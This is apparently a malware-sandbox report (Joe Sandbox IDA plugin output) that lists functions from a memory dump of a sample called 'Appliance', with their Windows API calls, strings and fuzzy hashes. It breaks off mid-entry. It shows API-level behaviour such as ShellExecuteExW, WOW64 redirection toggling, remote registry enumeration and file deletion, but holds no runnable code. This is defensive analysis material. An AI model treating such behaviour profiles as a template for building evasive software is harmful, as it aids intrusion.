CloseHandle.KERNEL32(?), ref: 00E221E1
CloseHandle.KERNEL32(?), ref: 00E221E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00E221F2
HeapFree.KERNEL32(00000000), ref: 00E221F9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5ec0e9d81efaa491ea1eea8f36e5702801c839880918772708cb732b39f29c42
Instruction ID: 79562b91bfdd5dd40dd1287db7afe74f7ac12d66d95b79e63f575428251dacf5
Opcode Fuzzy Hash: 5ec0e9d81efaa491ea1eea8f36e5702801c839880918772708cb732b39f29c42
Instruction Fuzzy Hash: 44E0E576008605BFDB151FA2ED0C90ABF39FF49323B104A21F225E2470CB32A464DB51

Function 00E4B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00E4B903

Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF

GetProcessId.KERNEL32(00000000), ref: 00E4B998
CloseHandle.KERNEL32(00000000), ref: 00E4B9C7

Strings

@, xrefs: 00E4B8D2
<, xrefs: 00E4B8CB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 02b5b51f96e36134498dd62e019fe833c6a82742ddbb0f4039a60dbb481f8cbf
Instruction ID: bdeb4126558bfbfc7498952fb10b65890c337d3e077366e78edf6ea09fd20453
Opcode Fuzzy Hash: 02b5b51f96e36134498dd62e019fe833c6a82742ddbb0f4039a60dbb481f8cbf
Instruction Fuzzy Hash: CE715474A0021ADFCB14EF65C494A9EBBF4EF08314F048499E956AB362CB71ED45CBA0

Function 00E27B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E27B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E27BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E27BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E27C36

Strings

DllGetClassObject, xrefs: 00E27BA9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 482bb8367a45a2940bd08d2bcc7dc633bebc9ee1b0544ebdade138dad0f4c726
Instruction ID: b23d0d1543db8d6dab855041a9747e19b401733c21d00c1bddd76bb37c5f70fb
Opcode Fuzzy Hash: 482bb8367a45a2940bd08d2bcc7dc633bebc9ee1b0544ebdade138dad0f4c726
Instruction Fuzzy Hash: C241B2B1604324EFDB19CF34E885A9ABBB9EF48314F1490A9AC45AF205D7B1DD44CBA0

Function 00E54818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E548D1
IsMenu.USER32(?), ref: 00E548E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E5492E
DrawMenuBar.USER32 ref: 00E54941

Strings

0, xrefs: 00E54825

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 4402b741514f8d1ccbafafddf343a6aa74b3acf486293e4732715ccfcb206806
Instruction ID: 545b21b8f0a701c0ce7efe186eeeae3692f9c4e6ea6a9f5e45462afff2672a12
Opcode Fuzzy Hash: 4402b741514f8d1ccbafafddf343a6aa74b3acf486293e4732715ccfcb206806
Instruction Fuzzy Hash: 28417BB5A0024AEFDF14CF51D884EAABBB9FF45329F045519FD45A7290D330AD88CB60

Function 00E2272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E245FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E24620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E227B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E227C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00E227F6

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

Strings

ListBox, xrefs: 00E22772
ComboBox, xrefs: 00E2273D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 12ce3f7538aa4008808bec964f71e1529fb0639a01260820db34b3fe207b58f1
Instruction ID: 6d9d876f2e96142308a9a35eada75ac17d50e3841a71e7744de99249ea6a317b
Opcode Fuzzy Hash: 12ce3f7538aa4008808bec964f71e1529fb0639a01260820db34b3fe207b58f1
Instruction Fuzzy Hash: 8E212671900204BFDB19AB60EC46DFE7BB8DF45364F00522EF512B71E1CB74894A9670

Function 00E539B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E53A29
LoadLibraryW.KERNEL32(?), ref: 00E53A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E53A45
DestroyWindow.USER32(?), ref: 00E53A4D

Strings

SysAnimate32, xrefs: 00E53A04

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 3b27d79b73a5c2bd87d82c4a1aeb093ec7efae15149a8a8d4620e0422b086d2a
Instruction ID: 21fc27450ceae33f267e505944c755a6f5f33a683df7edb509323390c1f4b10c
Opcode Fuzzy Hash: 3b27d79b73a5c2bd87d82c4a1aeb093ec7efae15149a8a8d4620e0422b086d2a
Instruction Fuzzy Hash: 7E21A171600209AFEF109FB4DC80FBB77E9EB843A9F106A19FE91A2191C771CD459760

Function 00E59A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

GetCursorPos.USER32(?), ref: 00E59A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E59A72
GetCursorPos.USER32(?), ref: 00E59ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00E59AF0

Strings

(, xrefs: 00E59A30

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID: (
API String ID: 2864067406-2063206799
Opcode ID: dfd9b08ad9abad3d9bcd6248c394b6ff7f7b2b7d2cf3cb26939080ef53024e6f
Instruction ID: 7f73743bb85728ca8318754e2058f203d0d3889ae8c115400c12137e9dbfcd24
Opcode Fuzzy Hash: dfd9b08ad9abad3d9bcd6248c394b6ff7f7b2b7d2cf3cb26939080ef53024e6f
Instruction Fuzzy Hash: 0121DD30600218FFDF298F55C848EFE7BB9EB49312F404859FA05AB1A2D3309959DB60

Function 00DC1AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00DC1AF4
GetClientRect.USER32(?,?), ref: 00E031F9
GetCursorPos.USER32(?), ref: 00E03203
ScreenToClient.USER32(?,?), ref: 00E0320E

Strings

(, xrefs: 00DC1AB2

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID: (
API String ID: 4127811313-2063206799
Opcode ID: a6086968ab40b9e5696e4ba6067a318fc5cbb3a415309c27966e5896a66da3de
Instruction ID: 734ccf916c33fe92d57431fe4703e94a6aaa706c4d898e11d571c6a2191818ea
Opcode Fuzzy Hash: a6086968ab40b9e5696e4ba6067a318fc5cbb3a415309c27966e5896a66da3de
Instruction Fuzzy Hash: 04112835A0212AAFCB149FA9C945EEE77B8FF05355F100856E902F3141D770BA96CBB1

Function 00DE50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00DE508E,?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002), ref: 00DE50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DE5110
FreeLibrary.KERNEL32(00000000,?,?,?,00DE508E,?,?,00DE502E,?,00E898D8,0000000C,00DE5185,?,00000002,00000000), ref: 00DE5133

Strings

CorExitProcess, xrefs: 00DE5108
mscoree.dll, xrefs: 00DE50F6

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8b3a87d0f0276e4bf9924d05518f1b6ac18949dc65ed90637bda4197782c4220
Instruction ID: 2135eed80587471f42b9cf183d667ce517c3c3df87aeee60dad3805c2273a137
Opcode Fuzzy Hash: 8b3a87d0f0276e4bf9924d05518f1b6ac18949dc65ed90637bda4197782c4220
Instruction Fuzzy Hash: 1FF0C834944708BFDB156F96EC09B9DBFB4EF04752F040064F805B2160DB705D84DBA1

Function 00E1E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00E1E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E1E797
FreeLibrary.KERNEL32(00000000), ref: 00E1E7BD

Strings

X64, xrefs: 00E1E680
GetSystemWow64DirectoryW, xrefs: 00E1E791

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: ff518de8861bf4ea82721d3f2fc02b7df34a368393a9a90ea2bc6cc13cf9a680
Instruction ID: a0e68ebe8f750751ce43836309650d6da74073e06ec10ad54ded80e3f4b80d7b
Opcode Fuzzy Hash: ff518de8861bf4ea82721d3f2fc02b7df34a368393a9a90ea2bc6cc13cf9a680
Instruction Fuzzy Hash: C1E02BB080AB119FE73557214D84EED33146F10706B641559FC06F6350EB30CCC4C794

Function 00DC663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DC665C
FreeLibrary.KERNEL32(00000000,?,?,00DC668B,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00DC6656
kernel32.dll, xrefs: 00DC6642

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 7d44ba4c1d90012475c306d57947544221299bef5bb4e41efda3768d40ca149c
Instruction ID: d48e500564cbe39f575f75a96268ccf18dea55fe2df3c03765d8996a9cdde498
Opcode Fuzzy Hash: 7d44ba4c1d90012475c306d57947544221299bef5bb4e41efda3768d40ca149c
Instruction Fuzzy Hash: 60E08C36646F231B92322726BC08FAEA6289F82B23B090259FD04F3240DFA0CC0585F5

Function 00DC6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DC6622
FreeLibrary.KERNEL32(00000000,?,?,00E05657,?,?,00DC62FA,?,00000001,?,?,00000000), ref: 00DC6635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00DC661C
kernel32.dll, xrefs: 00DC6609

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: e4a13b4a08ce7ef546c34d5493086792738cf28e866ccc5fa64e949d28122a15
Instruction ID: 260af9acd2dd61cdf02acd7150a869b290d05714718946ece8aa18aec9552249
Opcode Fuzzy Hash: e4a13b4a08ce7ef546c34d5493086792738cf28e866ccc5fa64e949d28122a15
Instruction Fuzzy Hash: 6ED01736657F336B82362B36AD18ECE6B149F92F223090869B804B3154DF60CD09C6E9

Function 00E33306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E335C4
DeleteFileW.KERNEL32(?), ref: 00E33646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E3365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E3366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E3367F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 63349875e020d52ea3214ab3167a3426b8e1b9ade660f0844b3b902b9bb18763
Instruction ID: 528cae3d60eccd6937585d4ba3d3c857fdba62c39d6d7745596e4ce1b37844c5
Opcode Fuzzy Hash: 63349875e020d52ea3214ab3167a3426b8e1b9ade660f0844b3b902b9bb18763
Instruction Fuzzy Hash: 6AB13D72901119ABDF15EBA5CC89EDEBBBDEF48314F0040AAF509F7151EA349A44CB71

Function 00E4ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00E4AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E4AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E4AEC8
CloseHandle.KERNEL32(?), ref: 00E4B09D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 372e15ae462ba53637996d1b98deb2d4072df0140bbaacbc0570963c890b2992
Instruction ID: 077f14c181e8209660a76120de2120519f35fb91735b5df7eddba57a41998e47
Opcode Fuzzy Hash: 372e15ae462ba53637996d1b98deb2d4072df0140bbaacbc0570963c890b2992
Instruction Fuzzy Hash: 54A191B1A04301AFE720DF24D886F2AB7E5EF44714F14885DF5999B392D771EC448BA1

Function 00E4C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333

Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E4C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00E4C606
RegCloseKey.ADVAPI32(00000000), ref: 00E4C613

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 0d72ed889ed60932abe5068edf0ba234129b352548039aee5eef23a6a922c68c
Instruction ID: e79c2cc8cef7055f55d16980ee9c63e776a11fb7979b368ea6fb869695c9f47c
Opcode Fuzzy Hash: 0d72ed889ed60932abe5068edf0ba234129b352548039aee5eef23a6a922c68c
Instruction Fuzzy Hash: BF61B331109241AFC714DF14D890F6ABBE5FF84318F54999DF05A9B292CB31ED46CBA2

Function 00E2ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E2D7CD,?), ref: 00E2E714

Part of subcall function 00E2E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E2D7CD,?), ref: 00E2E72D

Part of subcall function 00E2EAB0: GetFileAttributesW.KERNEL32(?,00E2D840), ref: 00E2EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00E2ED8A
MoveFileW.KERNEL32(?,?), ref: 00E2EDC3
_wcslen.LIBCMT ref: 00E2EF02
_wcslen.LIBCMT ref: 00E2EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E2EF67

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 810bbb961321635848e261cf7571753b058c3939ec9e0223aea8e49e7ad90769
Instruction ID: 6e16053de9bfeee0d9934c0293581b12134111fa1e8ac31314017bc59ac88b69
Opcode Fuzzy Hash: 810bbb961321635848e261cf7571753b058c3939ec9e0223aea8e49e7ad90769
Instruction Fuzzy Hash: 205162B25083959BC724EBA0DC919DBB3ECEF84354F00192EF285E3151EF71A6888776

Function 00E29517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

